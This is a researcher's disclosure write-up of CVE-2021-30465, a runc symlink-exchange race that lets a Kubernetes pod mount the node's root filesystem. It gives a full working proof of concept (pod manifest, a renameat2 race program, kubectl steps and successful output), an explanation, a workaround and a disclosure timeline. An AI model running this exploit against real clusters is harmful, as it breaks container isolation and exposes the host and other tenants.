# runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)

It's November 2020 and I'm troubleshooting a container running on K8S that is doing tons of writes to the local disk.
As those writes are just temporary state, I quickly add an `emptyDir` `tmpfs` volume at `/var/run`,
open a ticket so that my devs make it permanent, and call it a day.

Some time later I notice, looking at the `mount` output, that this new `tmpfs` is mounted at `/run` instead of `/var/run`,
which I had missed earlier and which surprises me a bit. `/var/run` is a symlink to `../run`, and
a quick test confirms that having `mount` follow symlinks is normal Linux behavior,
so I start wondering how containerd/runc makes sure the mounts stay inside the container rootfs.

After following the code responsible for the mounts, I end up reading the comment on [`securejoin.SecureJoinVFS()`](https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57-L60):
```
// Note that the guarantees provided by this function only apply if the path
// components in the returned string are not modified (in other words are not
// replaced with symlinks on the filesystem) after this function has returned.
// Such a symlink race is necessarily out-of-scope of SecureJoin.
```
Reading this, you know the race condition exists; the question is how to exploit it to escape to the K8S host.

## POC

When mounting a volume, runc trusts the source and lets the kernel follow symlinks, but it doesn't trust the target argument: it uses the `filepath-securejoin` library to resolve any symlinks and ensure the resolved target stays inside the container root.
As explained in the [SecureJoinVFS() documentation](https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57-L60), using this function is only safe if you know that the checked path is not going to be replaced by a symlink afterwards. The problem is that we can replace it with a symlink.
In K8S there is a trivial way to control the timing: create a pod with multiple containers sharing some volumes, one with a correct image, and the other ones with non-existent images so they don't start right away.

Let's start with the POC first and the explanations after.

1. Create our attack pod

   ```
   kubectl create -f - <<EOF
   apiVersion: v1
   kind: Pod
   metadata:
     name: attack
   spec:
     terminationGracePeriodSeconds: 1
     containers:
     - name: c1
       image: ubuntu:latest
       command: [ "/bin/sleep", "inf" ]
       env:
       - name: MY_POD_UID
         valueFrom:
           fieldRef:
             fieldPath: metadata.uid
       volumeMounts:
       - name: test1
         mountPath: /test1
       - name: test2
         mountPath: /test2
   $(for c in {2..20}; do
   cat <<EOC
     - name: c$c
       image: donotexists.com/do/not:exist
       command: [ "/bin/sleep", "inf" ]
       volumeMounts:
       - name: test1
         mountPath: /test1
   $(for m in {1..4}; do
   cat <<EOM
       - name: test2
         mountPath: /test1/mnt$m
   EOM
   done
   )
       - name: test2
         mountPath: /test1/zzz
   EOC
   done
   )
     volumes:
     - name: test1
       emptyDir:
         medium: "Memory"
     - name: test2
       emptyDir:
         medium: "Memory"
   EOF
   ```

2. Compile `race.c` (a simple binary that loops on `renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE)` to atomically swap a directory and a symlink)

   ```
   cat > race.c <<'EOF'
   #define _GNU_SOURCE
   #include <fcntl.h>
   #include <stdio.h>
   #include <stdlib.h>
   #include <sys/types.h>
   #include <sys/stat.h>
   #include <unistd.h>
   #include <sys/syscall.h>

   int main(int argc, char *argv[]) {
       if (argc != 4) {
           fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
           exit(EXIT_FAILURE);
       }
       char *name1 = argv[1];
       char *name2 = argv[2];
       char *linkdest = argv[3];

       int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
       if (dirfd < 0) {
           perror("Error open CWD");
           exit(EXIT_FAILURE);
       }

       /* create the directory and the symlink we will keep exchanging;
          EEXIST on restart is fine, so do not exit on error */
       if (mkdir(name1, 0755) < 0) {
           perror("mkdir failed");
       }
       if (symlink(linkdest, name2) < 0) {
           perror("symlink failed");
       }

       /* atomically swap the two names forever (the renameat2() wrapper
          needs glibc >= 2.28) */
       while (1) {
           renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
       }
   }
   EOF

   gcc race.c -O3 -o race
   ```

3. Wait for container c1 to start, upload the `race` binary to it, and exec bash

   ```
   sleep 30 # wait for the first container to start
   kubectl cp race -c c1 attack:/test1/
   kubectl exec -ti pod/attack -c c1 -- bash
   ```

   You now have a shell in container c1.

4. Create the following symlink (explanations later)

   ```
   ln -s / /test2/test2
   ```

5. Launch `race` multiple times in parallel to try to win this TOCTOU race

   ```
   cd test1
   seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
   ```

6. Now that everything is ready, in a second shell, update the images so that the other containers can start

   ```
   for c in {2..20}; do
     kubectl set image pod attack c$c=ubuntu:latest
   done
   ```

7. Wait a bit and look at the results

   ```
   for c in {2..20}; do
     echo ~~ Container c$c ~~
     kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz
   done
   ```
   ```
   ~~ Container c2 ~~
   test2
   ~~ Container c3 ~~
   test2
   ~~ Container c4 ~~
   test2
   ~~ Container c5 ~~
   bin dev home lib64 mnt postinst root sbin tmp var
   boot etc lib lost+found opt proc run sys usr
   ~~ Container c6 ~~
   bin dev home lib64 mnt postinst root sbin tmp var
   boot etc lib lost+found opt proc run sys usr
   ~~ Container c7 ~~
   error: unable to upgrade connection: container not found ("c7")
   ~~ Container c8 ~~
   test2
   ~~ Container c9 ~~
   bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
   ~~ Container c10 ~~
   test2
   ~~ Container c11 ~~
   bin dev home lib64 mnt postinst root sbin tmp var
   boot etc lib lost+found opt proc run sys usr
   ~~ Container c12 ~~
   test2
   ~~ Container c13 ~~
   test2
   ~~ Container c14 ~~
   test2
   ~~ Container c15 ~~
   bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
   ~~ Container c16 ~~
   error: unable to upgrade connection: container not found ("c16")
   ~~ Container c17 ~~
   error: unable to upgrade connection: container not found ("c17")
   ~~ Container c18 ~~
   bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
   ~~ Container c19 ~~
   error: unable to upgrade connection: container not found ("c19")
   ~~ Container c20 ~~
   test2
   ```

On my first try running this POC, I had 6 containers where `/test1/zzz` was `/` on the node, some containers failed to start, and the remaining ones were not affected.

Even without the ability to update images, we could use a fast registry for c1 and a slow registry or a big image for c2+; we just need c1 to start one second before the others.

Tests were done on the following GKE cluster:
```
gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes
```

K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs

## Explanations

I haven't dug too deep into the code and relied on strace to understand what was happening. I also did the investigation about a month before finally having a working POC, so details are fuzzy, but here is my understanding:

1. K8S prepares all the volumes for the pod in `/var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME`
   (In my POC I'm using the fact that the path is known, but looking at `/proc/self/mountinfo` leaks all you need to find it)
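
   A sketch of that leak (hedged; the sample line and parser below are made up for illustration): some K8S-managed bind mounts, like `/etc/hosts`, carry a host path of the form `/var/lib/kubelet/pods/<uid>/...` in the "root" field of `/proc/self/mountinfo` (see `proc(5)`), so a trivial parser recovers the pod UID from inside the container.

   ```c
   #include <stdio.h>
   #include <string.h>

   int main(void) {
       /* made-up mountinfo-style line; on a real pod, read lines from
          /proc/self/mountinfo instead and look at the 4th field */
       const char *line =
           "2154 2001 8:1 /var/lib/kubelet/pods/"
           "12345678-1234-1234-1234-123456789abc/etc-hosts "
           "/etc/hosts rw,relatime - ext4 /dev/sda1 rw";
       const char *p = strstr(line, "/pods/");
       if (!p)
           return 1;
       p += strlen("/pods/");
       size_t n = strcspn(p, "/ "); /* the UID ends at the next '/' or space */
       printf("pod UID: %.*s\n", (int)n, p);
       return 0;
   }
   ```
   
   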

2. containerd prepares the rootfs at `/run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs`

3. runc calls `unshare(CLONE_NEWNS)` and sets the mount propagation to `MS_SLAVE`, preventing the following mount operations from affecting other containers or the node directly

4. runc bind-mounts the K8S volumes

   1. runc calls `securejoin.SecureJoin()` to resolve the destination/target

   2. runc calls `mount()`

K8S doesn't give us control over the mount source, but we have full control over the target of the mount,
so the trick is to mount, over the K8S volumes path, a directory containing a symlink, so that the next mount uses this new source and gives us access to the node root filesystem.

From the node, the filesystem looks like this:
```
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
...
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /
```

Our `race` binary is constantly swapping `mntX` and `mnt-tmpX`. When c2+ start, they do the following mounts:
```
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/mntX)
```
which is equivalent to
```
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)
```
as the volume is bind-mounted into the container rootfs.

If we are lucky, `mntX` is a directory when we call `SecureJoin()`, and has become a symlink by the time we call `mount()`. As `mount()` follows symlinks, this gives us:
```
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)
```

The filesystem now looks like:
```
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /
```

When we do the final mount:
```
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
```
it resolves to:
```
mount(/, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
```

And we now have full access to the whole node root, including `/dev`, `/proc`, all the tmpfs and overlay mounts of other containers, everything :)

## Workaround

A possible workaround is to forbid mounting volumes inside volumes, but as usual, upgrading is recommended.

## Comments

This POC is far from optimal and, as already stated, being able to update the image is not mandatory.

It took me some tries to get a working POC. At first I was trying to just mount the `tmpfs` volume over host paths (`/root/.ssh`) to impact the host directly,
but this doesn't work as the mounts happen in a new mount namespace (with the right mount propagation set), so they are not visible in the host mount namespace.
I then tried a Go version of the race binary with 4 containers and 20 volumes, and it always failed. I switched to a C version (not sure it makes a difference) with 19 containers and 4 mounts, and this worked, giving me 6 containers out of 19 with the host root mounted.

Even with newer syscalls like `openat2()`, you still need to `mount(/proc/self/fd/X, /proc/self/fd/Y)` to be race free. I'm not sure how useful a new mount flag that fails when one of the parameters is a symlink would be, but the current behavior is a huge footgun.

This vulnerability exists because having untrusted/restricted container definitions was not part of the initial threat model of Docker/runc; that requirement was added later by K8S.
You can sometimes read that K8S is multi-tenant, but you have to understand that as multiple trusted teams, not as giving API access to strangers.

On February 24th, Google introduced GKE Autopilot: fully managed K8S clusters with an emphasis on security and, in theory, no access to the node, so after testing I also reported the issue to them.

## Timeline

* 2020-11-??: Discovered the `SecureJoinVFS()` comment
* 2020-12-26: Initial report to [email protected] (Merry Christmas :) )
* 2020-12-27: Report acknowledgment
* 2021-03-06: Report to Google for their new GKE Autopilot
* 2021-04-07: Got added to discussions around the fix
* 2021-04-08: Google bounty :) (to be donated to Handicap International)
* 2021-05-19: End of embargo, advisory published on [GitHub](https://github.com/opencontainers/runc/security/advisories/GHSA-c3xm-pvg7-gh7r) and on [OSS-Security](https://www.openwall.com/lists/oss-security/2021/05/19/2)
* 2021-05-30: Write-up + POC public

## Acknowledgments

Thanks to Aleksa Sarai (runc maintainer) for his fast responses and all his work, to Noah Meyerhans and Samuel Karp for their help fixing and testing, and to Google for the bounty.